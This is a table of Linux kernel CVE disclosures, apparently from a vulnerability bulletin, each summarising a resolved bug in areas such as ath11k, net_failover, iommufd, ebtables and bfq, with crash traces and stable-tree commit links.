| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix registration of 6Ghz-only phy without the full channel range Because of what seems to be a typo, a 6Ghz-only phy for which the BDF does not allow the 7115Mhz channel will fail to register: WARNING: CPU: 2 PID: 106 at net/wireless/core.c:907 wiphy_register+0x914/0x954 Modules linked in: ath11k_pci sbsa_gwdt CPU: 2 PID: 106 Comm: kworker/u8:5 Not tainted 6.3.0-rc7-next-20230418-00549-g1e096a17625a-dirty #9 Hardware name: Freebox V7R Board (DT) Workqueue: ath11k_qmi_driver_event ath11k_qmi_driver_event_work pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : wiphy_register+0x914/0x954 lr : ieee80211_register_hw+0x67c/0xc10 sp : ffffff800b123aa0 x29: ffffff800b123aa0 x28: 0000000000000000 x27: 0000000000000000 x26: 0000000000000000 x25: 0000000000000006 x24: ffffffc008d51418 x23: ffffffc008cb0838 x22: ffffff80176c2460 x21: 0000000000000168 x20: ffffff80176c0000 x19: ffffff80176c03e0 x18: 0000000000000014 x17: 00000000cbef338c x16: 00000000d2a26f21 x15: 00000000ad6bb85f x14: 0000000000000020 x13: 0000000000000020 x12: 00000000ffffffbd x11: 0000000000000208 x10: 00000000fffffdf7 x9 : ffffffc009394718 x8 : ffffff80176c0528 x7 : 000000007fffffff x6 : 0000000000000006 x5 : 0000000000000005 x4 : ffffff800b304284 x3 : ffffff800b304284 x2 : ffffff800b304d98 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: wiphy_register+0x914/0x954 ieee80211_register_hw+0x67c/0xc10 ath11k_mac_register+0x7c4/0xe10 ath11k_core_qmi_firmware_ready+0x1f4/0x570 ath11k_qmi_driver_event_work+0x198/0x590 process_one_work+0x1b8/0x328 worker_thread+0x6c/0x414 kthread+0x100/0x104 ret_from_fork+0x10/0x20 ---[ end trace 0000000000000000 ]--- ath11k_pci 0002:01:00.0: ieee80211 registration failed: -22 ath11k_pci 0002:01:00.0: failed register the radio with mac80211: -22 ath11k_pci 0002:01:00.0: failed to create pdev core: -22 | 2025-12-30 | not yet calculated | CVE-2023-54229 | https://git.kernel.org/stable/c/532f8bac60419eb28158770470b9bb655de207c8 https://git.kernel.org/stable/c/f97832620d7f320bea81707f34631371e87a419b https://git.kernel.org/stable/c/8d1342108c2bf11aaaf293becfc010ecdb6170d9 https://git.kernel.org/stable/c/32ca096e712a78b2f0d2e48d33dc0caaba9f9866 https://git.kernel.org/stable/c/e2ceb1de2f83aafd8003f0b72dfd4b7441e97d14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amba: bus: fix refcount leak commit 5de1540b7bc4 ("drivers/amba: create devices from device tree") increases the refcount of of_node but does not release it in amba_device_release, so there is a refcount leak. Use of_node_put to avoid the refcount leak. | 2025-12-30 | not yet calculated | CVE-2023-54230 | https://git.kernel.org/stable/c/94e398df32e850f26828690ee62f7441979583cc https://git.kernel.org/stable/c/9062ce0ccbd82fbe81cc839a512c0ad90847e01c https://git.kernel.org/stable/c/03db4fe7917bb160eeccf3968835475fa32b7e10 https://git.kernel.org/stable/c/9baf2278b3eed2c50112169121257d8a6ee0606c https://git.kernel.org/stable/c/4f1807fddd9bf175ee5e14fffc6b6106e4b297ef https://git.kernel.org/stable/c/81ff633a88be2482c163d3acd2801d501261ce6a https://git.kernel.org/stable/c/206fadb7278ceac7593dd0b945a77b9df856a674 https://git.kernel.org/stable/c/8b60a706166de5de82314494704c2419e7657bf8 https://git.kernel.org/stable/c/e312cbdc11305568554a9e18a2ea5c2492c183f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: fix memory leak in wx_setup_rx_resources When wx_alloc_page_pool() fails in wx_setup_rx_resources(), it doesn't release the DMA buffer. Add dma_free_coherent() in the error path to release the DMA buffer. | 2025-12-30 | not yet calculated | CVE-2023-54231 | https://git.kernel.org/stable/c/2371e1ecd445baf793a74db00ea6b2a2bc13c4c0 https://git.kernel.org/stable/c/e315e7b83a22043bffee450437d7089ef373cbf6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: m68k: Only force 030 bus error if PC not in exception table __get_kernel_nofault() does copy data in supervisor mode when forcing a task backtrace log through /proc/sysrq_trigger. This is expected to cause a bus error exception, e.g. on NULL pointer dereferencing when logging a kernel task that has no workqueue associated. This bus error ought to be ignored. Our 030 bus error handler is ill equipped to deal with this: Whenever ssw indicates a kernel mode access on a data fault, we don't even attempt to handle the fault and instead always send a SEGV signal (or panic). As a result, the check for exception handling at the fault PC (buried in send_sig_fault() which gets called from do_page_fault() eventually) is never used. In contrast, both 040 and 060 access error handlers do not care whether a fault happened on supervisor mode access, and will call do_page_fault() on those, ultimately honoring the exception table. Add a check in bus_error030 to call do_page_fault() in case we do have an entry for the fault PC in our exception table. I had attempted a fix for this earlier in 2019 that did rely on testing pagefault_disabled() (see link below) to achieve the same thing, but this patch should be more generic. Tested on 030 Atari Falcon. | 2025-12-30 | not yet calculated | CVE-2023-54232 | https://git.kernel.org/stable/c/1a6059f5ed57f48edfe7159404ff7d538d9d405b https://git.kernel.org/stable/c/f55cb52ec98b22125f5bda36391edb8894f7e8cf https://git.kernel.org/stable/c/2100e374251a8fc00cce1916cfc50f3cb652cbe3 https://git.kernel.org/stable/c/df1da53a7e98f0b2a0eb2241c154f148f2f2c1d8 https://git.kernel.org/stable/c/8bf8d5dade4c5e1d8a2386f29253ed28b5d87735 https://git.kernel.org/stable/c/54fa25ffab2b700df5abd58c136d64a912c53953 https://git.kernel.org/stable/c/ec15405b80fc15ffc87a23d01378ae061c1aba07 https://git.kernel.org/stable/c/e36a82bebbf7da814530d5a179bef9df5934b717 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: avoid a NULL dereference with unsupported widgets If an IPC4 topology contains an unsupported widget, its .module_info field won't be set, then sof_ipc4_route_setup() will cause a kernel Oops trying to dereference it. Add a check for such cases. | 2025-12-30 | not yet calculated | CVE-2023-54233 | https://git.kernel.org/stable/c/170818974e9732506195c6302743856cc8bdfd6f https://git.kernel.org/stable/c/e3720f92e0237921da537e47a0b24e27899203f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Fix missing mrioc->evtack_cmds initialization Commit c1af985d27da ("scsi: mpi3mr: Add Event acknowledgment logic") introduced an array mrioc->evtack_cmds but initialization of the array elements was missed. They are just zero cleared. The function mpi3mr_complete_evt_ack() refers to the host_tag field of the elements. Due to the zero value of the host_tag field, the function calls clear_bit() for mrioc->evtack_cmds_bitmap with the wrong bit index. This results in memory access to an invalid address and "BUG: KASAN: use-after-free". This BUG was observed at eHBA-9600 firmware update to version 8.3.1.0. To fix it, add the missing initialization of mrioc->evtack_cmds. | 2025-12-30 | not yet calculated | CVE-2023-54234 | https://git.kernel.org/stable/c/4e0dfdb48a824deac3dfbc67fb856ef2aee13529 https://git.kernel.org/stable/c/67989091e11a974003ddf2ec39bc613df8eadd83 https://git.kernel.org/stable/c/e39ea831ebad4ab15c4748cb62a397a8abcca36e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/DOE: Fix destroy_work_on_stack() race The following debug object splat was observed in testing: ODEBUG: free active (active state 0) object: 0000000097d23782 object type: work_struct hint: doe_statemachine_work+0x0/0x510 WARNING: CPU: 1 PID: 71 at lib/debugobjects.c:514 debug_print_object+0x7d/0xb0 ... Workqueue: pci 0000:36:00.0 DOE [1 doe_statemachine_work RIP: 0010:debug_print_object+0x7d/0xb0 ... Call Trace: ? debug_print_object+0x7d/0xb0 ? __pfx_doe_statemachine_work+0x10/0x10 debug_object_free.part.0+0x11b/0x150 doe_statemachine_work+0x45e/0x510 process_one_work+0x1d4/0x3c0 This occurs because destroy_work_on_stack() was called after signaling the completion in the calling thread. This creates a race between destroy_work_on_stack() and the task->work struct going out of scope in pci_doe(). Signal the work complete after destroying the work struct. This is safe because signal_task_complete() is the final thing the work item does and the workqueue code is careful not to access the work struct after. | 2025-12-30 | not yet calculated | CVE-2023-54235 | https://git.kernel.org/stable/c/d96799ee3b78962c80e4b6653734f488f999ca09 https://git.kernel.org/stable/c/c4f9c0a3a6df143f2e1092823b7fa9e07d6ab57f https://git.kernel.org/stable/c/19cf3ba16dcc2ef059dcf010072d4f96d76486e0 https://git.kernel.org/stable/c/e3a3a097eaebaf234a482b4d2f9f18fe989208c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/net_failover: fix txq exceeding warning The failover txq is initialized with 16 queues. When a packet is transmitted from the failover device for the first time, the failover device will select the queue which is returned from the primary device if the primary device is UP and running. If the primary device's txq count is bigger than the default 16, it can lead to the following warning: eth0 selects TX queue 18, but real number of TX queues is 16 The warning backtrace is: [ 32.146376] CPU: 18 PID: 9134 Comm: chronyd Tainted: G E 6.2.8-1.el7.centos.x86_64 #1 [ 32.147175] Hardware name: Red Hat KVM, BIOS 1.10.2-3.el7_4.1 04/01/2014 [ 32.147730] Call Trace: [ 32.147971] <TASK> [ 32.148183] dump_stack_lvl+0x48/0x70 [ 32.148514] dump_stack+0x10/0x20 [ 32.148820] netdev_core_pick_tx+0xb1/0xe0 [ 32.149180] __dev_queue_xmit+0x529/0xcf0 [ 32.149533] ? __check_object_size.part.0+0x21c/0x2c0 [ 32.149967] ip_finish_output2+0x278/0x560 [ 32.150327] __ip_finish_output+0x1fe/0x2f0 [ 32.150690] ip_finish_output+0x2a/0xd0 [ 32.151032] ip_output+0x7a/0x110 [ 32.151337] ? __pfx_ip_finish_output+0x10/0x10 [ 32.151733] ip_local_out+0x5e/0x70 [ 32.152054] ip_send_skb+0x19/0x50 [ 32.152366] udp_send_skb.isra.0+0x163/0x3a0 [ 32.152736] udp_sendmsg+0xba8/0xec0 [ 32.153060] ? __folio_memcg_unlock+0x25/0x60 [ 32.153445] ? __pfx_ip_generic_getfrag+0x10/0x10 [ 32.153854] ? sock_has_perm+0x85/0xa0 [ 32.154190] inet_sendmsg+0x6d/0x80 [ 32.154508] ? inet_sendmsg+0x6d/0x80 [ 32.154838] sock_sendmsg+0x62/0x70 [ 32.155152] ____sys_sendmsg+0x134/0x290 [ 32.155499] ___sys_sendmsg+0x81/0xc0 [ 32.155828] ? _get_random_bytes.part.0+0x79/0x1a0 [ 32.156240] ? ip4_datagram_release_cb+0x5f/0x1e0 [ 32.156649] ? get_random_u16+0x69/0xf0 [ 32.156989] ? __fget_light+0xcf/0x110 [ 32.157326] __sys_sendmmsg+0xc4/0x210 [ 32.157657] ? __sys_connect+0xb7/0xe0 [ 32.157995] ? __audit_syscall_entry+0xce/0x140 [ 32.158388] ? syscall_trace_enter.isra.0+0x12c/0x1a0 [ 32.158820] __x64_sys_sendmmsg+0x24/0x30 [ 32.159171] do_syscall_64+0x38/0x90 [ 32.159493] entry_SYSCALL_64_after_hwframe+0x72/0xdc Fix that by reducing the txq number, as is done for a non-existent primary device. | 2025-12-30 | not yet calculated | CVE-2023-54236 | https://git.kernel.org/stable/c/105cc268328231d5c2bfcbd03f265cec444a3492 https://git.kernel.org/stable/c/f032e125149d914e542548c17ebd613851031368 https://git.kernel.org/stable/c/2d5cebf57296f0189a61482035ad420384eedead https://git.kernel.org/stable/c/c942f5cd63b7c2e73fe06744185a34b03267595b https://git.kernel.org/stable/c/44d250c22209c680f61befbc2ac326da5452da01 https://git.kernel.org/stable/c/e3cbdcb0fbb61045ef3ce0e072927cc41737f787 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: fix potential panic due to unprotected smc_llc_srv_add_link() There is a certain chance to trigger the following panic: PID: 5900 TASK: ffff88c1c8af4100 CPU: 1 COMMAND: "kworker/1:48" #0 [ffff9456c1cc79a0] machine_kexec at ffffffff870665b7 #1 [ffff9456c1cc79f0] __crash_kexec at ffffffff871b4c7a #2 [ffff9456c1cc7ab0] crash_kexec at ffffffff871b5b60 #3 [ffff9456c1cc7ac0] oops_end at ffffffff87026ce7 #4 [ffff9456c1cc7ae0] page_fault_oops at ffffffff87075715 #5 [ffff9456c1cc7b58] exc_page_fault at ffffffff87ad0654 #6 [ffff9456c1cc7b80] asm_exc_page_fault at ffffffff87c00b62 [exception RIP: ib_alloc_mr+19] RIP: ffffffffc0c9cce3 RSP: ffff9456c1cc7c38 RFLAGS: 00010202 RAX: 0000000000000000 RBX: 0000000000000002 RCX: 0000000000000004 RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff88c1ea281d00 R8: 000000020a34ffff R9: ffff88c1350bbb20 R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000 R13: 0000000000000010 R14: ffff88c1ab040a50 R15: ffff88c1ea281d00 ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018 #7 [ffff9456c1cc7c60] smc_ib_get_memory_region at ffffffffc0aff6df [smc] #8 [ffff9456c1cc7c88] smcr_buf_map_link at ffffffffc0b0278c [smc] #9 [ffff9456c1cc7ce0] __smc_buf_create at ffffffffc0b03586 [smc] The reason here is that when the server tries to create a second link, smc_llc_srv_add_link() has no protection and may add a new link to the link group. This breaks the security environment protected by llc_conf_mutex. | 2025-12-30 | not yet calculated | CVE-2023-54237 | https://git.kernel.org/stable/c/f2f46de98c11d41ac8d22765f47ba54ce5480a5b https://git.kernel.org/stable/c/0c764cc271d3aa6528ae1b3394babf34ac01f775 https://git.kernel.org/stable/c/e40b801b3603a8f90b46acbacdea3505c27f01c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlx5: fix skb leak while fifo resync and push During the ptp resync operation SKBs were popped from the fifo but were never freed, neither by napi_consume nor by dev_kfree_skb_any. Add a call to napi_consume_skb to properly free SKBs. Another leak was happening because mlx5e_skb_fifo_has_room() had an error in the check. Comparing free running counters works well unless C promotes the types to something wider than the counter. In this case the counters are u16 but the result of the subtraction is promoted to int, and it causes a wrong result (negative value) of the check when the producer has already wrapped around but the consumer hasn't yet. An explicit cast to u16 fixes the issue. | 2025-12-30 | not yet calculated | CVE-2023-54238 | https://git.kernel.org/stable/c/234cffda95e1049f58e8ec136ef105c633f0ed19 https://git.kernel.org/stable/c/68504c66d08c70fb92799722e25a932d311d74fd https://git.kernel.org/stable/c/e435941b1da1a0be4ff8a7ae425774c76a5ac514 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Check for uptr overflow syzkaller found that setting up a map with a user VA that wraps past zero can trigger WARN_ONs, particularly from pin_user_pages weirdly returning 0 due to invalid arguments. Prevent creating pages with a uptr and size whose sum would arithmetically overflow. WARNING: CPU: 0 PID: 518 at drivers/iommu/iommufd/pages.c:793 pfn_reader_user_pin+0x2e6/0x390 Modules linked in: CPU: 0 PID: 518 Comm: repro Not tainted 6.3.0-rc2-eeac8ede1755+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:pfn_reader_user_pin+0x2e6/0x390 Code: b1 11 e9 25 fe ff ff e8 28 e4 0f ff 31 ff 48 89 de e8 2e e6 0f ff 48 85 db 74 0a e8 14 e4 0f ff e9 4d ff ff ff e8 0a e4 0f ff <0f> 0b bb f2 ff ff ff e9 3c ff ff ff e8 f9 e3 0f ff ba 01 00 00 00 RSP: 0018:ffffc90000f9fa30 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff821e2b72 RDX: 0000000000000000 RSI: ffff888014184680 RDI: 0000000000000002 RBP: ffffc90000f9fa78 R08: 00000000000000ff R09: 0000000079de6f4e R10: ffffc90000f9f790 R11: ffff888014185418 R12: ffffc90000f9fc60 R13: 0000000000000002 R14: ffff888007879800 R15: 0000000000000000 FS: 00007f4227555740(0000) GS:ffff88807dc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000043 CR3: 000000000e748005 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: <TASK> pfn_reader_next+0x14a/0x7b0 ? interval_tree_double_span_iter_update+0x11a/0x140 pfn_reader_first+0x140/0x1b0 iopt_pages_rw_slow+0x71/0x280 ? __this_cpu_preempt_check+0x20/0x30 iopt_pages_rw_access+0x2b2/0x5b0 iommufd_access_rw+0x19f/0x2f0 iommufd_test+0xd11/0x16f0 ? write_comp_data+0x2f/0x90 iommufd_fops_ioctl+0x206/0x330 __x64_sys_ioctl+0x10e/0x160 ? __pfx_iommufd_fops_ioctl+0x10/0x10 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-30 | not yet calculated | CVE-2023-54239 | https://git.kernel.org/stable/c/800963e7eb001ada8cf2418f159fb649694467f1 https://git.kernel.org/stable/c/e4395701330fc4aee530905039516fe770b81417 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all() rule_locs is allocated in ethtool_get_rxnfc and the size is determined by rule_cnt from user space. So rule_cnt needs to be checked before using rule_locs to avoid NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54240 | https://git.kernel.org/stable/c/7776591e5ae2befff86579f68916a171971c6aab https://git.kernel.org/stable/c/751b2e22a188b0c306029d094da29b6b8de31430 https://git.kernel.org/stable/c/653fbddbdfc6673bba01b13dae5a4384ad8f92ec https://git.kernel.org/stable/c/75f2de75c1182e80708c932418e4895dbc88b68f https://git.kernel.org/stable/c/072324cfab9b96071c0782f51f53cc5aea1e9d5b https://git.kernel.org/stable/c/ff5faed5f5487b0fd2b640ba1304f82a5ebaab42 https://git.kernel.org/stable/c/fe0195fe48f85182bc7e7eabcad925bd3cbc10f5 https://git.kernel.org/stable/c/e4c79810755f66c9a933ca810da2724133b1165a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: KVM: Fix NULL pointer dereference After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we get a NULL pointer dereference when creating a KVM guest: [ 146.243409] Starting KVM with MIPS VZ extensions [ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c [ 149.849177] Oops[#1]: [ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671 [ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020 [ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740 [ 149.849209] $ 4 : 000000007400cce1 000000007400cce1 0000000000000000 0000000000000000 [ 149.849221] $ 8 : 000000240058bb36 ffffffff81421ac0 0000000000000000 0000000000400dc0 [ 149.849233] $12 : 9800000102a07cc8 ffffffff80e40e38 0000000000000001 0000000000400dc0 [ 149.849245] $16 : 0000000000000000 9800000106cd0000 9800000106cd0000 9800000100cce000 [ 149.849257] $20 : ffffffffc0632b28 ffffffffc05b31b0 9800000100ccca00 0000000000400000 [ 149.849269] $24 : 9800000106cd09ce ffffffff802f69d0 [ 149.849281] $28 : 9800000102a04000 9800000102a07cd0 98000001106a8000 ffffffffc063568c [ 149.849293] Hi : 00000335b2111e66 [ 149.849295] Lo : 6668d90061ae0ae9 [ 149.849298] epc : ffffffffc06356ec kvm_vz_vcpu_setup+0xc4/0x328 [kvm] [ 149.849324] ra : ffffffffc063568c kvm_vz_vcpu_setup+0x64/0x328 [kvm] [ 149.849336] Status: 7400cce3 KX SX UX KERNEL EXL IE [ 149.849351] Cause : 1000000c (ExcCode 03) [ 149.849354] BadVA : 0000000000000300 [ 149.849357] PrId : 0014c004 (ICT Loongson-3) [ 149.849360] Modules linked in: kvm nfnetlink_queue nfnetlink_log nfnetlink fuse sha256_generic libsha256 cfg80211 rfkill binfmt_misc vfat fat snd_hda_codec_hdmi input_leds led_class snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_pcm snd_timer snd serio_raw xhci_pci radeon drm_suballoc_helper drm_display_helper xhci_hcd ip_tables x_tables [ 149.849432] Process qemu-system-mip (pid: 2265, threadinfo=00000000ae2982d2, task=0000000038e09ad4, tls=000000ffeba16030) [ 149.849439] Stack : 9800000000000003 9800000100ccca00 9800000100ccc000 ffffffffc062cef4 [ 149.849453] 9800000102a07d18 c89b63a7ab338e00 0000000000000000 ffffffff811a0000 [ 149.849465] 0000000000000000 9800000106cd0000 ffffffff80e59938 98000001106a8920 [ 149.849476] ffffffff80e57f30 ffffffffc062854c ffffffff811a0000 9800000102bf4240 [ 149.849488] ffffffffc05b0000 ffffffff80e3a798 000000ff78000000 000000ff78000010 [ 149.849500] 0000000000000255 98000001021f7de0 98000001023f0078 ffffffff81434000 [ 149.849511] 0000000000000000 0000000000000000 9800000102ae0000 980000025e92ae28 [ 149.849523] 0000000000000000 c89b63a7ab338e00 0000000000000001 ffffffff8119dce0 [ 149.849535] 000000ff78000010 ffffffff804f3d3c 9800000102a07eb0 0000000000000255 [ 149.849546] 0000000000000000 ffffffff8049460c 000000ff78000010 0000000000000255 [ 149.849558] ... [ 149.849565] Call Trace: [ 149.849567] [<ffffffffc06356ec>] kvm_vz_vcpu_setup+0xc4/0x328 [kvm] [ 149.849586] [<ffffffffc062cef4>] kvm_arch_vcpu_create+0x184/0x228 [kvm] [ 149.849605] [<ffffffffc062854c>] kvm_vm_ioctl+0x64c/0xf28 [kvm] [ 149.849623] [<ffffffff805209c0>] sys_ioctl+0xc8/0x118 [ 149.849631] [<ffffffff80219eb0>] syscall_common+0x34/0x58 The root cause is the deletion of kvm_mips_commpage_init() leaves vcpu->arch.cop0 NULL. So fix it by making cop0 from a pointer to an embedded object. | 2025-12-30 | not yet calculated | CVE-2023-54241 | https://git.kernel.org/stable/c/cd517f9a9d07d41f4f3593b1da3982261e09d162 https://git.kernel.org/stable/c/bd9cf2a5f9e1b2229ad22f21de6f6ad1a9c8858e https://git.kernel.org/stable/c/6b9fb255d53759e3ea9b30067cb55091df1caf06 https://git.kernel.org/stable/c/e4de2057698636c0ee709e545d19b169d2069fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block, bfq: Fix division by zero error on zero wsum When the weighted sum is zero the calculation of limit causes a division by zero error. Fix this by continuing to the next level. This was discovered by running as root: stress-ng --ioprio 0 Fixes division by zero oops: [ 521.450556] divide error: 0000 [#1] SMP NOPTI [ 521.450766] CPU: 2 PID: 2684464 Comm: stress-ng-iopri Not tainted 6.2.1-1280.native #1 [ 521.451117] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014 [ 521.451627] RIP: 0010:bfqq_request_over_limit+0x207/0x400 [ 521.451875] Code: 01 48 8d 0c c8 74 0b 48 8b 82 98 00 00 00 48 8d 0c c8 8b 85 34 ff ff ff 48 89 ca 41 0f af 41 50 48 d1 ea 48 98 48 01 d0 31 d2 <48> f7 f1 41 39 41 48 89 85 34 ff ff ff 0f 8c 7b 01 00 00 49 8b 44 [ 521.452699] RSP: 0018:ffffb1af84eb3948 EFLAGS: 00010046 [ 521.452938] RAX: 000000000000003c RBX: 0000000000000000 RCX: 0000000000000000 [ 521.453262] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffb1af84eb3978 [ 521.453584] RBP: ffffb1af84eb3a30 R08: 0000000000000001 R09: ffff8f88ab8a4ba0 [ 521.453905] R10: 0000000000000000 R11: 0000000000000001 R12: ffff8f88ab8a4b18 [ 521.454224] R13: ffff8f8699093000 R14: 0000000000000001 R15: ffffb1af84eb3970 [ 521.454549] FS: 00005640b6b0b580(0000) GS:ffff8f88b3880000(0000) knlGS:0000000000000000 [ 521.454912] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 521.455170] CR2: 00007ffcbcae4e38 CR3: 00000002e46de001 CR4: 0000000000770ee0 [ 521.455491] PKRU: 55555554 [ 521.455619] Call Trace: [ 521.455736] <TASK> [ 521.455837] ? bfq_request_merge+0x3a/0xc0 [ 521.456027] ? elv_merge+0x115/0x140 [ 521.456191] bfq_limit_depth+0xc8/0x240 [ 521.456366] __blk_mq_alloc_requests+0x21a/0x2c0 [ 521.456577] blk_mq_submit_bio+0x23c/0x6c0 [ 521.456766] __submit_bio+0xb8/0x140 [ 521.457236] submit_bio_noacct_nocheck+0x212/0x300 [ 521.457748] submit_bio_noacct+0x1a6/0x580 [ 521.458220] submit_bio+0x43/0x80 [ 521.458660] ext4_io_submit+0x23/0x80 [ 521.459116] ext4_do_writepages+0x40a/0xd00 [ 521.459596] ext4_writepages+0x65/0x100 [ 521.460050] do_writepages+0xb7/0x1c0 [ 521.460492] __filemap_fdatawrite_range+0xa6/0x100 [ 521.460979] file_write_and_wait_range+0xbf/0x140 [ 521.461452] ext4_sync_file+0x105/0x340 [ 521.461882] __x64_sys_fsync+0x67/0x100 [ 521.462305] ? syscall_exit_to_user_mode+0x2c/0x1c0 [ 521.462768] do_syscall_64+0x3b/0xc0 [ 521.463165] entry_SYSCALL_64_after_hwframe+0x5a/0xc4 [ 521.463621] RIP: 0033:0x5640b6c56590 [ 521.464006] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 80 3d 71 70 0e 00 00 74 17 b8 4a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c | 2025-12-30 | not yet calculated | CVE-2023-54242 | https://git.kernel.org/stable/c/1655cfc85250a224b0d9486c8136baeea33b9b5c https://git.kernel.org/stable/c/c0346a59d719461248c6dc6f21c9e55ef836b66f https://git.kernel.org/stable/c/e53413f8deedf738a6782cc14cc00bd5852ccf18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: ebtables: fix table blob use-after-free We are not allowed to return an error at this point. Looking at the code it looks like ret is always 0 at this point, but it's not. t = find_table_lock(net, repl->name, &ret, &ebt_mutex); ... this can return a valid table, with ret != 0. This bug causes update of table->private with the new blob, but then frees the blob right away in the caller. Syzbot report: BUG: KASAN: vmalloc-out-of-bounds in __ebt_unregister_table+0xc00/0xcd0 net/bridge/netfilter/ebtables.c:1168 Read of size 4 at addr ffffc90005425000 by task kworker/u4:4/74 Workqueue: netns cleanup_net Call Trace: kasan_report+0xbf/0x1f0 mm/kasan/report.c:517 __ebt_unregister_table+0xc00/0xcd0 net/bridge/netfilter/ebtables.c:1168 ebt_unregister_table+0x35/0x40 net/bridge/netfilter/ebtables.c:1372 ops_exit_list+0xb0/0x170 net/core/net_namespace.c:169 cleanup_net+0x4ee/0xb10 net/core/net_namespace.c:613 ... ip(6)tables appears to be ok (ret should be 0 at this point) but make this more obvious. | 2025-12-30 | not yet calculated | CVE-2023-54243 | https://git.kernel.org/stable/c/9060abce3305ab2354c892c09d5689df51486df5 https://git.kernel.org/stable/c/dbb3cbbf03b3c52cb390fabec357f1e4638004f5 https://git.kernel.org/stable/c/3dd6ac973351308d4117eda32298a9f1d68764fd https://git.kernel.org/stable/c/cda0e0243bd3c04008fcd37a46b0269fb3c49249 https://git.kernel.org/stable/c/e58a171d35e32e6e8c37cfe0e8a94406732a331f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: EC: Fix oops when removing custom query handlers When removing custom query handlers, the handler might still be used inside the EC query workqueue, causing a kernel oops if the module holding the callback function was already unloaded. Fix this by flushing the EC query workqueue when removing custom query handlers. Tested on an Acer Travelmate 4002WLMi | 2025-12-30 | not yet calculated | CVE-2023-54244 | https://git.kernel.org/stable/c/130e3eac51912f2c866e7d035992ede25f8feac0 https://git.kernel.org/stable/c/0d528a7c421b1f1772fc1d29370b3b5fc0f42b19 https://git.kernel.org/stable/c/ccae2233e9935a038a35fe8cfd703df905f700e7 https://git.kernel.org/stable/c/066b90bca755f0b876e7b027b75d1796861d6db0 https://git.kernel.org/stable/c/f4a573eed6377d356f835a4b00099d5dacee0da0 https://git.kernel.org/stable/c/86a159fd5bdb01ec34b160cfda1a313b616d9302 https://git.kernel.org/stable/c/fd2c99e81ae0dbdd62a154ef9c77fc01715cc020 https://git.kernel.org/stable/c/e5b492c6bb900fcf9722e05f4a10924410e170c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: codecs: tx-macro: Fix for KASAN: slab-out-of-bounds When we run syzkaller we get the below Out of Bound. "KASAN: slab-out-of-bounds Read in regcache_flat_read" Below is the backtrace of the issue: dump_backtrace+0x0/0x4c8 show_stack+0x34/0x44 dump_stack_lvl+0xd8/0x118 print_address_description+0x30/0x2d8 kasan_report+0x158/0x198 __asan_report_load4_noabort+0x44/0x50 regcache_flat_read+0x10c/0x110 regcache_read+0xf4/0x180 _regmap_read+0xc4/0x278 _regmap_update_bits+0x130/0x290 regmap_update_bits_base+0xc0/0x15c snd_soc_component_update_bits+0xa8/0x22c snd_soc_component_write_field+0x68/0xd4 tx_macro_digital_mute+0xec/0x140 Actually there is no need to have decimator with 32 bits. By limiting the variable to the short type u8 the issue is resolved. | 2025-12-30 | not yet calculated | CVE-2023-54245 | https://git.kernel.org/stable/c/da35a4e6eee5d73886312e85322a6e97df901987 https://git.kernel.org/stable/c/57f9a9a232bde7abfe49c3072b29a255da9ba891 https://git.kernel.org/stable/c/b0cd740a31412340fead50e69e4fe9bc3781c754 https://git.kernel.org/stable/c/e5e7e398f6bb7918dab0612eb6991f7bae95520d |
